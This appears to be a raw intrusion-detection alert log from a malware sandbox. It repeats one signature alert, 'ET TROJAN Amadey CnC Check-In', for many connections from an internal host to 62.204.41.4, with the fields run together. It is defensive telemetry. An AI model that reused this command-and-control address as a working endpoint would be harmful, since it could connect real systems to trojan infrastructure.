                          192.168.2.662.204.41.450293802027700 02/07/23-20:03:32.801081TCP2027700ET TROJAN Amadey CnC Check-In5029380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450327802027700 02/07/23-20:03:41.188880TCP2027700ET TROJAN Amadey CnC Check-In5032780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449806802027700 02/07/23-20:01:14.154494TCP2027700ET TROJAN Amadey CnC Check-In4980680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450425802027700 02/07/23-20:04:05.253501TCP2027700ET TROJAN Amadey CnC Check-In5042580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450097802027700 02/07/23-20:02:39.099671TCP2027700ET TROJAN Amadey CnC Check-In5009780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449769802027700 02/07/23-20:01:03.043961TCP2027700ET TROJAN Amadey CnC Check-In4976980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450410802027700 02/07/23-20:04:01.580414TCP2027700ET TROJAN Amadey CnC Check-In5041080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450054802027700 02/07/23-20:02:24.270996TCP2027700ET TROJAN Amadey CnC Check-In5005480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449787802027700 02/07/23-20:01:09.515244TCP2027700ET TROJAN Amadey CnC Check-In4978780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450388802027700 02/07/23-20:03:56.189946TCP2027700ET TROJAN Amadey CnC Check-In5038880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450036802027700 02/07/23-20:02:19.847586TCP2027700ET TROJAN Amadey CnC Check-In5003680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450092802027700 02/07/23-20:02:37.868052TCP2027700ET TROJAN Amadey CnC Check-In5009280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450232802027700 02/07/23-20:03:15.344051TCP2027700ET TROJAN Amadey CnC Check-In5023280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449957802027700 02/07/23-20:01:56.989416TCP2027700ET TROJAN Amadey CnC Check-In4995780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450031802027700 02/07/23-20:02:18.637614TCP2027700ET TROJAN Amadey CnC Check-In5003180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450250802027700 02/07/23-20:03:19.754500TCP2027700ET TROJAN Amadey CnC Check-In5025080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449862802027700 02/07/23-20:01:30.125467TCP2027700ET TROJAN Amadey CnC Check-In4986280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450481802027700 02/07/23-20:04:18.893120TCP2027700ET TROJAN Amadey CnC Check-In5048180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450072802027700 02/07/23-20:02:32.475919TCP2027700ET TROJAN Amadey CnC Check-In5007280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449779802027700 02/07/23-20:01:05.232360TCP2027700ET TROJAN Amadey CnC Check-In4977980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449870802027700 02/07/23-20:01:32.078335TCP2027700ET TROJAN Amadey CnC Check-In4987080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449998802027700 02/07/23-20:02:10.416841TCP2027700ET TROJAN Amadey CnC Check-In4999880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450108802027700 02/07/23-20:02:41.932133TCP2027700ET TROJAN Amadey CnC Check-In5010880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450149802027700 02/07/23-20:02:55.389818TCP2027700ET TROJAN Amadey CnC Check-In5014980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450026802027700 02/07/23-20:02:17.408058TCP2027700ET TROJAN Amadey CnC Check-In5002680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449975802027700 02/07/23-20:02:01.204512TCP2027700ET TROJAN Amadey CnC Check-In4997580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450222802027700 02/07/23-20:03:12.933465TCP2027700ET TROJAN Amadey CnC Check-In5022280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449797802027700 02/07/23-20:01:12.000477TCP2027700ET TROJAN Amadey CnC Check-In4979780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450204802027700 02/07/23-20:03:08.498529TCP2027700ET TROJAN Amadey CnC Check-In5020480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450398802027700 02/07/23-20:03:58.636270TCP2027700ET TROJAN Amadey CnC Check-In5039880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449834802027700 02/07/23-20:01:20.722458TCP2027700ET TROJAN Amadey CnC Check-In4983480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450400802027700 02/07/23-20:03:59.133077TCP2027700ET TROJAN Amadey CnC Check-In5040080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450008802027700 02/07/23-20:02:12.917280TCP2027700ET TROJAN Amadey CnC Check-In5000880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449811802027700 02/07/23-20:01:15.342261TCP2027700ET TROJAN Amadey CnC Check-In4981180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450044802027700 02/07/23-20:02:21.772716TCP2027700ET TROJAN Amadey CnC Check-In5004480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450393802027700 02/07/23-20:03:57.421090TCP2027700ET TROJAN Amadey CnC Check-In5039380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450041802027700 02/07/23-20:02:21.067703TCP2027700ET TROJAN Amadey CnC Check-In5004180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449967802027700 02/07/23-20:01:59.487215TCP2027700ET TROJAN Amadey CnC Check-In4996780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449909802027700 02/07/23-20:01:41.612708TCP2027700ET TROJAN Amadey CnC Check-In4990980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450237802027700 02/07/23-20:03:16.563327TCP2027700ET TROJAN Amadey CnC Check-In5023780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449860802027700 02/07/23-20:01:29.628066TCP2027700ET TROJAN Amadey CnC Check-In4986080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450252802027700 02/07/23-20:03:20.248979TCP2027700ET TROJAN Amadey CnC Check-In5025280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450415802027700 02/07/23-20:04:02.837203TCP2027700ET TROJAN Amadey CnC Check-In5041580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449789802027700 02/07/23-20:01:10.000649TCP2027700ET TROJAN Amadey CnC Check-In4978980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450160802027700 02/07/23-20:02:58.000084TCP2027700ET TROJAN Amadey CnC Check-In5016080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450430802027700 02/07/23-20:04:06.494424TCP2027700ET TROJAN Amadey CnC Check-In5043080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449832802027700 02/07/23-20:01:20.240759TCP2027700ET TROJAN Amadey CnC Check-In4983280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450451802027700 02/07/23-20:04:11.626762TCP2027700ET TROJAN Amadey CnC Check-In5045180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450013802027700 02/07/23-20:02:14.205368TCP2027700ET TROJAN Amadey CnC Check-In5001380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450016802027700 02/07/23-20:02:14.953404TCP2027700ET TROJAN Amadey CnC Check-In5001680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450365802027700 02/07/23-20:03:50.517630TCP2027700ET TROJAN Amadey CnC Check-In5036580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450074802027700 02/07/23-20:02:32.940709TCP2027700ET TROJAN Amadey CnC Check-In5007480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449924802027700 02/07/23-20:01:46.876099TCP2027700ET TROJAN Amadey CnC Check-In4992480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449939802027700 02/07/23-20:01:52.546117TCP2027700ET TROJAN Amadey CnC Check-In4993980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450273802027700 02/07/23-20:03:27.900257TCP2027700ET TROJAN Amadey CnC Check-In5027380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450329802027700 02/07/23-20:03:41.705909TCP2027700ET TROJAN Amadey CnC Check-In5032980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450059802027700 02/07/23-20:02:26.009359TCP2027700ET TROJAN Amadey CnC Check-In5005980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449746802027700 02/07/23-20:00:57.646912TCP2027700ET TROJAN Amadey CnC Check-In4974680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450224802027700 02/07/23-20:03:13.408043TCP2027700ET TROJAN Amadey CnC Check-In5022480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449865802027700 02/07/23-20:01:30.873059TCP2027700ET TROJAN Amadey CnC Check-In4986580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449824802027700 02/07/23-20:01:18.327900TCP2027700ET TROJAN Amadey CnC Check-In4982480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450005802027700 02/07/23-20:02:12.152880TCP2027700ET TROJAN Amadey CnC Check-In5000580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450187802027700 02/07/23-20:03:04.340649TCP2027700ET TROJAN Amadey CnC Check-In5018780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449995802027700 02/07/23-20:02:09.662326TCP2027700ET TROJAN Amadey CnC Check-In4999580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449784802027700 02/07/23-20:01:06.918802TCP2027700ET TROJAN Amadey CnC Check-In4978480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450146802027700 02/07/23-20:02:54.625344TCP2027700ET TROJAN Amadey CnC Check-In5014680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450265802027700 02/07/23-20:03:25.941004TCP2027700ET TROJAN Amadey CnC Check-In5026580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450443802027700 02/07/23-20:04:09.644630TCP2027700ET TROJAN Amadey CnC Check-In5044380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450402802027700 02/07/23-20:03:59.613926TCP2027700ET TROJAN Amadey CnC Check-In5040280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449759802027700 02/07/23-20:01:00.829527TCP2027700ET TROJAN Amadey CnC Check-In4975980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450087802027700 02/07/23-20:02:36.507624TCP2027700ET TROJAN Amadey CnC Check-In5008780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450290802027700 02/07/23-20:03:32.058144TCP2027700ET TROJAN Amadey CnC Check-In5029080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450378802027700 02/07/23-20:03:53.744252TCP2027700ET TROJAN Amadey CnC Check-In5037880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449978802027700 02/07/23-20:02:01.964465TCP2027700ET TROJAN Amadey CnC Check-In4997880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449890802027700 02/07/23-20:01:36.846820TCP2027700ET TROJAN Amadey CnC Check-In4989080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450159802027700 02/07/23-20:02:57.764941TCP2027700ET TROJAN Amadey CnC Check-In5015980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450118802027700 02/07/23-20:02:44.402579TCP2027700ET TROJAN Amadey CnC Check-In5011880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450337802027700 02/07/23-20:03:43.661817TCP2027700ET TROJAN Amadey CnC Check-In5033780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449937802027700 02/07/23-20:01:52.063127TCP2027700ET TROJAN Amadey CnC Check-In4993780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450046802027700 02/07/23-20:02:22.274271TCP2027700ET TROJAN Amadey CnC Check-In5004680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449718802027700 02/07/23-20:00:50.878461TCP2027700ET TROJAN Amadey CnC Check-In4971880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450260802027700 02/07/23-20:03:22.605985TCP2027700ET TROJAN Amadey CnC Check-In5026080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450306802027700 02/07/23-20:03:36.017602TCP2027700ET TROJAN Amadey CnC Check-In5030680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450300802027700 02/07/23-20:03:34.563838TCP2027700ET TROJAN Amadey CnC Check-In5030080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450211802027700 02/07/23-20:03:10.237661TCP2027700ET TROJAN Amadey CnC Check-In5021180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450122802027700 02/07/23-20:02:45.389628TCP2027700ET TROJAN Amadey CnC Check-In5012280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450474802027700 02/07/23-20:04:17.216226TCP2027700ET TROJAN Amadey CnC Check-In5047480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449794802027700 02/07/23-20:01:11.263709TCP2027700ET TROJAN Amadey CnC Check-In4979480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449766802027700 02/07/23-20:01:02.341785TCP2027700ET TROJAN Amadey CnC Check-In4976680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449944802027700 02/07/23-20:01:53.792362TCP2027700ET TROJAN Amadey CnC Check-In4994480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449855802027700 02/07/23-20:01:26.978024TCP2027700ET TROJAN Amadey CnC Check-In4985580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449883802027700 02/07/23-20:01:35.109836TCP2027700ET TROJAN Amadey CnC Check-In4988380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449962802027700 02/07/23-20:01:58.212789TCP2027700ET TROJAN Amadey CnC Check-In4996280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450296802027700 02/07/23-20:03:33.595122TCP2027700ET TROJAN Amadey CnC Check-In5029680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450033802027700 02/07/23-20:02:19.127549TCP2027700ET TROJAN Amadey CnC Check-In5003380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449873802027700 02/07/23-20:01:32.847820TCP2027700ET TROJAN Amadey CnC Check-In4987380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450385802027700 02/07/23-20:03:55.477920TCP2027700ET TROJAN Amadey CnC Check-In5038580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450039802027700 02/07/23-20:02:20.584895TCP2027700ET TROJAN Amadey CnC Check-In5003980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450128802027700 02/07/23-20:02:48.244683TCP2027700ET TROJAN Amadey CnC Check-In5012880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450140802027700 02/07/23-20:02:53.167783TCP2027700ET TROJAN Amadey CnC Check-In5014080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450217802027700 02/07/23-20:03:11.704054TCP2027700ET TROJAN Amadey CnC Check-In5021780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450051802027700 02/07/23-20:02:23.494295TCP2027700ET TROJAN Amadey CnC Check-In5005180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450095802027700 02/07/23-20:02:38.620537TCP2027700ET TROJAN Amadey CnC Check-In5009580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449738802027700 02/07/23-20:00:55.702188TCP2027700ET TROJAN Amadey CnC Check-In4973880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450184802027700 02/07/23-20:03:03.616190TCP2027700ET TROJAN Amadey CnC Check-In5018480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450227802027700 02/07/23-20:03:14.108353TCP2027700ET TROJAN Amadey CnC Check-In5022780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449804802027700 02/07/23-20:01:13.672357TCP2027700ET TROJAN Amadey CnC Check-In4980480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450316802027700 02/07/23-20:03:38.501751TCP2027700ET TROJAN Amadey CnC Check-In5031680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450357802027700 02/07/23-20:03:48.563249TCP2027700ET TROJAN Amadey CnC Check-In5035780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450446802027700 02/07/23-20:04:10.384849TCP2027700ET TROJAN Amadey CnC Check-In5044680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450405802027700 02/07/23-20:04:00.344097TCP2027700ET TROJAN Amadey CnC Check-In5040580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449916802027700 02/07/23-20:01:43.294683TCP2027700ET TROJAN Amadey CnC Check-In4991680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449934802027700 02/07/23-20:01:51.338963TCP2027700ET TROJAN Amadey CnC Check-In4993480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449827802027700 02/07/23-20:01:19.034168TCP2027700ET TROJAN Amadey CnC Check-In4982780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449756802027700 02/07/23-20:01:00.094396TCP2027700ET TROJAN Amadey CnC Check-In4975680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449893802027700 02/07/23-20:01:37.604134TCP2027700ET TROJAN Amadey CnC Check-In4989380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450156802027700 02/07/23-20:02:57.043867TCP2027700ET TROJAN Amadey CnC Check-In5015680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450280802027700 02/07/23-20:03:29.633131TCP2027700ET TROJAN Amadey CnC Check-In5028080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449845802027700 02/07/23-20:01:23.372817TCP2027700ET TROJAN Amadey CnC Check-In4984580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450061802027700 02/07/23-20:02:27.765974TCP2027700ET TROJAN Amadey CnC Check-In5006180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450150802027700 02/07/23-20:02:55.620345TCP2027700ET TROJAN Amadey CnC Check-In5015080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449982802027700 02/07/23-20:02:02.953057TCP2027700ET TROJAN Amadey CnC Check-In4998280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450268802027700 02/07/23-20:03:26.680608TCP2027700ET TROJAN Amadey CnC Check-In5026880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450067802027700 02/07/23-20:02:31.198973TCP2027700ET TROJAN Amadey CnC Check-In5006780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450197802027700 02/07/23-20:03:06.840701TCP2027700ET TROJAN Amadey CnC Check-In5019780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450423802027700 02/07/23-20:04:04.774413TCP2027700ET TROJAN Amadey CnC Check-In5042380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450179802027700 02/07/23-20:03:02.638946TCP2027700ET TROJAN Amadey CnC Check-In5017980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450464802027700 02/07/23-20:04:14.739715TCP2027700ET TROJAN Amadey CnC Check-In5046480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450138802027700 02/07/23-20:02:52.674592TCP2027700ET TROJAN Amadey CnC Check-In5013880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450286802027700 02/07/23-20:03:31.095393TCP2027700ET TROJAN Amadey CnC Check-In5028680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450049802027700 02/07/23-20:02:23.003141TCP2027700ET TROJAN Amadey CnC Check-In5004980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450245802027700 02/07/23-20:03:18.483828TCP2027700ET TROJAN Amadey CnC Check-In5024580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450334802027700 02/07/23-20:03:42.924733TCP2027700ET TROJAN Amadey CnC Check-In5033480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450375802027700 02/07/23-20:03:53.005630TCP2027700ET TROJAN Amadey CnC Check-In5037580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449817802027700 02/07/23-20:01:16.563418TCP2027700ET TROJAN Amadey CnC Check-In4981780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450436802027700 02/07/23-20:04:07.968971TCP2027700ET TROJAN Amadey CnC Check-In5043680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449906802027700 02/07/23-20:01:40.847690TCP2027700ET TROJAN Amadey CnC Check-In4990680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449728802027700 02/07/23-20:00:53.301055TCP2027700ET TROJAN Amadey CnC Check-In4972880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450344802027700 02/07/23-20:03:45.384589TCP2027700ET TROJAN Amadey CnC Check-In5034480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450433802027700 02/07/23-20:04:07.254488TCP2027700ET TROJAN Amadey CnC Check-In5043380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450191802027700 02/07/23-20:03:05.327791TCP2027700ET TROJAN Amadey CnC Check-In5019180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449988802027700 02/07/23-20:02:04.410732TCP2027700ET TROJAN Amadey CnC Check-In4998880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449903802027700 02/07/23-20:01:40.097751TCP2027700ET TROJAN Amadey CnC Check-In4990380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449725802027700 02/07/23-20:00:52.567467TCP2027700ET TROJAN Amadey CnC Check-In4972580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449896802027700 02/07/23-20:01:38.330966TCP2027700ET TROJAN Amadey CnC Check-In4989680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449985802027700 02/07/23-20:02:03.672175TCP2027700ET TROJAN Amadey CnC Check-In4998580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449814802027700 02/07/23-20:01:15.831910TCP2027700ET TROJAN Amadey CnC Check-In4981480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450169802027700 02/07/23-20:03:00.200665TCP2027700ET TROJAN Amadey CnC Check-In5016980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450166802027700 02/07/23-20:02:59.478159TCP2027700ET TROJAN Amadey CnC Check-In5016680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449750802027700 02/07/23-20:00:58.621945TCP2027700ET TROJAN Amadey CnC Check-In4975080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449899802027700 02/07/23-20:01:39.123661TCP2027700ET TROJAN Amadey CnC Check-In4989980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450270802027700 02/07/23-20:03:27.172191TCP2027700ET TROJAN Amadey CnC Check-In5027080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450255802027700 02/07/23-20:03:20.983533TCP2027700ET TROJAN Amadey CnC Check-In5025580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450077802027700 02/07/23-20:02:33.659592TCP2027700ET TROJAN Amadey CnC Check-In5007780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450010802027700 02/07/23-20:02:13.422325TCP2027700ET TROJAN Amadey CnC Check-In5001080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450258802027700 02/07/23-20:03:21.947679TCP2027700ET TROJAN Amadey CnC Check-In5025880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450347802027700 02/07/23-20:03:46.099227TCP2027700ET TROJAN Amadey CnC Check-In5034780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450449802027700 02/07/23-20:04:11.130604TCP2027700ET TROJAN Amadey CnC Check-In5044980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450420802027700 02/07/23-20:04:04.035367TCP2027700ET TROJAN Amadey CnC Check-In5042080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449919802027700 02/07/23-20:01:44.090733TCP2027700ET TROJAN Amadey CnC Check-In4991980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449931802027700 02/07/23-20:01:50.612148TCP2027700ET TROJAN Amadey CnC Check-In4993180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449801802027700 02/07/23-20:01:12.934086TCP2027700ET TROJAN Amadey CnC Check-In4980180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449842802027700 02/07/23-20:01:22.668685TCP2027700ET TROJAN Amadey CnC Check-In4984280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450023802027700 02/07/23-20:02:16.679938TCP2027700ET TROJAN Amadey CnC Check-In5002380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450372802027700 02/07/23-20:03:52.297867TCP2027700ET TROJAN Amadey CnC Check-In5037280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449753802027700 02/07/23-20:00:59.355095TCP2027700ET TROJAN Amadey CnC Check-In4975380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450153802027700 02/07/23-20:02:56.341247TCP2027700ET TROJAN Amadey CnC Check-In5015380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450242802027700 02/07/23-20:03:17.764359TCP2027700ET TROJAN Amadey CnC Check-In5024280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450461802027700 02/07/23-20:04:14.005420TCP2027700ET TROJAN Amadey CnC Check-In5046180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450331802027700 02/07/23-20:03:42.173293TCP2027700ET TROJAN Amadey CnC Check-In5033180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450194802027700 02/07/23-20:03:06.078733TCP2027700ET TROJAN Amadey CnC Check-In5019480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450201802027700 02/07/23-20:03:07.797561TCP2027700ET TROJAN Amadey CnC Check-In5020180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450408802027700 02/07/23-20:04:01.096954TCP2027700ET TROJAN Amadey CnC Check-In5040880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450112802027700 02/07/23-20:02:42.895840TCP2027700ET TROJAN Amadey CnC Check-In5011280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450283802027700 02/07/23-20:03:30.376799TCP2027700ET TROJAN Amadey CnC Check-In5028380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450064802027700 02/07/23-20:02:30.633740TCP2027700ET TROJAN Amadey CnC Check-In5006480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450319802027700 02/07/23-20:03:39.222800TCP2027700ET TROJAN Amadey CnC Check-In5031980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449843802027700 02/07/23-20:01:22.907370TCP2027700ET TROJAN Amadey CnC Check-In4984380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450110802027700 02/07/23-20:02:42.417578TCP2027700ET TROJAN Amadey CnC Check-In5011080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450171802027700 02/07/23-20:03:00.685944TCP2027700ET TROJAN Amadey CnC Check-In5017180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450364802027700 02/07/23-20:03:50.279050TCP2027700ET TROJAN Amadey CnC Check-In5036480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450462802027700 02/07/23-20:04:14.252136TCP2027700ET TROJAN Amadey CnC Check-In5046280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450012802027700 02/07/23-20:02:13.968224TCP2027700ET TROJAN Amadey CnC Check-In5001280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450073802027700 02/07/23-20:02:32.709344TCP2027700ET TROJAN Amadey CnC Check-In5007380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449999802027700 02/07/23-20:02:10.659483TCP2027700ET TROJAN Amadey CnC Check-In4999980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450459802027700 02/07/23-20:04:13.538198TCP2027700ET TROJAN Amadey CnC Check-In5045980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449745802027700 02/07/23-20:00:57.394746TCP2027700ET TROJAN Amadey CnC Check-In4974580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449941802027700 02/07/23-20:01:53.041040TCP2027700ET TROJAN Amadey CnC Check-In4994180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450401802027700 02/07/23-20:03:59.377764TCP2027700ET TROJAN Amadey CnC Check-In5040180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450009802027700 02/07/23-20:02:13.165566TCP2027700ET TROJAN Amadey CnC Check-In5000980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450107802027700 02/07/23-20:02:41.686560TCP2027700ET TROJAN Amadey CnC Check-In5010780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450205802027700 02/07/23-20:03:08.738599TCP2027700ET TROJAN Amadey CnC Check-In5020580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450303802027700 02/07/23-20:03:35.307803TCP2027700ET TROJAN Amadey CnC Check-In5030380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450168802027700 02/07/23-20:02:59.953138TCP2027700ET TROJAN Amadey CnC Check-In5016880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449938802027700 02/07/23-20:01:52.305588TCP2027700ET TROJAN Amadey CnC Check-In4993880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450266802027700 02/07/23-20:03:26.196925TCP2027700ET TROJAN Amadey CnC Check-In5026680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450299802027700 02/07/23-20:03:34.321474TCP2027700ET TROJAN Amadey CnC Check-In5029980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449778802027700 02/07/23-20:01:04.997293TCP2027700ET TROJAN Amadey CnC Check-In4977880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449815802027700 02/07/23-20:01:16.077954TCP2027700ET TROJAN Amadey CnC Check-In4981580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449871802027700 02/07/23-20:01:32.342194TCP2027700ET TROJAN Amadey CnC Check-In4987180192.168.2.662.204.41.4
